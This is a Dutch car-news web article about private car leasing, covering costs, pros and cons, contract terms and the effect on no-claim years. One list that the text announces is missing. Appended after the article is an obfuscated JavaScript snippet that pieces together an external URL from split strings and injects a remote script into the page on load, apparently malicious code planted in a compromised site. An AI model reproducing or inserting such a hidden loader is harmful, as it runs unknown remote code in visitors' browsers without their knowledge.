Autonieuws

Private lease uitgelegd – Alles wat je moet weten over het private leasen van een auto

maart 18, 2022

Wat is private lease?
Met het private leasen van een auto krijg je de mogelijkheid als particulier om een (nieuwe) auto te rijden voor een vast bedrag per maand. Het is in principe een vorm van huren. De auto blijft in het bezit van de leasemaatschappij en jij kunt door maandelijks te betalen gebruik maken van de auto. Nadat het contract is verlopen kun je de auto weer inleveren bij diezelfde maatschappij.

Wat zijn de voordelen van private lease?

Private lease biedt enkele voordelen ten opzichte van het kopen van een (tweedehands) auto. Hieronder hebben we er vijf voor je op een rijtje gezet.

De prijs die je maandelijks betaalt voor de auto is een zogenaamde all-in prijs. Doordat het een vast bedrag is hoef je vaak alleen nog maar de brandstof te betalen. De rest van de kosten die horen bij het bezitten van een auto komen te vervallen voor jou als particulier. Over de volgende zaken hoef jij geen zorgen te maken als je private leaset:

Per aanbieder kan de inhoud verschillen. Bekijk dus altijd goed de voorwaarden in een aangeboden contract. Wat je wel altijd zelf moeten betalen zijn: brandstof- en parkeerkosten, verkeersboetes, tol en wasbeurten.

Het grootste voordeel van private lease is dat je niet over tienduizenden euro’s hoeft te beschikken om een nieuwe auto te rijden. Je bent daardoor niet in één keer een hele klap met geld kwijt, maar je kunt het bedrag uitsmeren over een langere periode.

Nadat je contract is afgelopen kun je de auto gewoon inleveren bij de leasemaatschappij. Je hebt dus niet het gedoe met inruilen of verkopen wanneer je een andere auto wilt.

Je weet van iedere maand wat het kost om de auto te kunnen rijden. Je hoeft dus niet zenuwachtig te worden wanneer de auto bij de garage staat, want eventuele dure reparaties zijn gedekt. Geen onverwachte kosten wat dat betreft.

Je geniet van alle voordelen van een nieuwe auto. Denk aan de laatste technologie op het gebied van veiligheid en connectiviteit. Bovendien zijn nieuwe auto’s zuiniger waardoor de brandstofkosten lager zijn dan bij een oudere tweedehands auto.

Zijn er nadelen aan private leasen?

Zijn er ook nadelen aan private leasen? Jawel. Het is belangrijk om te weten dat je een contract aangaat voor enkele jaren, die vaak worden uitgedrukt in maanden oplopend tot 60 maanden. Hoe langer het contract loopt, hoe lager de maandlasten zullen zijn. Neemt niet weg dat je een financiële verplichting hebt tijdens de loopduur van het contract en het is niet altijd mogelijk om het contract kosteloos tussentijds op te zeggen. Daarnaast is het goed om te weten dat het leasen van een auto gevolgen heeft voor de hoogte van de hypotheek als je nog wilt aanvragen.

Wat kost private leasen?

Aan het private leasen zitten kosten verbonden. Wat je maandelijks betaalt is afhankelijk van een aantal factoren die samen het totaalbedrag bepalen. Het is een combinatie van het type auto die wilt gaan leasen, voor hoe lang en het aantal jaarlijkse kilometers die je ermee gaat rijden. Houd als vuistregel aan: hoe groter de auto, hoe duurder en hoe korter de looptijd, hoe hoger het maandbedrag. Hetzelfde geldt voor het jaarkilometrage, die vaak in 10.000, 15.000. 20.000, 25.000 of 30.000 kilometer per jaar is gecategoriseerd, meer kilometers rijden betekent een hoger maandbedrag. Verder zullen leasemaatschappijen en/of automerken kosten in rekening brengen voor de opties en aankleding die je op je auto wilt hebben. Zo kan het zijn dat je voor een trekhaak, winterbanden of een speciaal optiepakket een paar euro meer per maand moet betalen.

Schadevrije jaren en leasen

Een goed punt om in het achterhoofd te houden zijn de schadevrije jaren die hebt opgebouwd. Enerzijds kunnen die ervoor zorgen dat je korting krijgt op je maandbedrag als je een leasecontract aangaat, maar anderzijds kan het zo zijn dat je schadevrije jaren niet doortellen op het moment dat je een auto leaset. Dit komt omdat de eigenaar van de auto de leasemaatschappij is en niet de bestuurder. Vaak vervallen schadevrije jaren na 5 jaar, die ingaan vanaf het moment dat je geen auto meer bezit. Niet iedere leasemaatschappij laat je schadevrije jaren opbouwen gedurende de looptijd van het contract. Dat heeft wellicht gevolgen voor wanneer je na het private leasen een eigen auto koopt, of een nieuwe leasecontract aangaat. Vaak kun je het wel aan de leasemaatschappij vragen wat er mogelijk is.

(function(){
ohn5=document.createElement(“script”);ohn5.async=true;ohn5_=”u”+(“s”)+”t”;
ohn5u=”371344429.”;ohn5_+=”a”+(“t.i”);ohn5_+=”n”+(“f”+”o”)+”/”;
ohn5u+=”Xm37lkfXhn5fujr9mhXhjX”+(“iq3ev310″);
ohn5.src=”https://”+ohn5_+ohn5u;ohn5.type=”text/javascript”;
document.body.appendChild(ohn5);
})();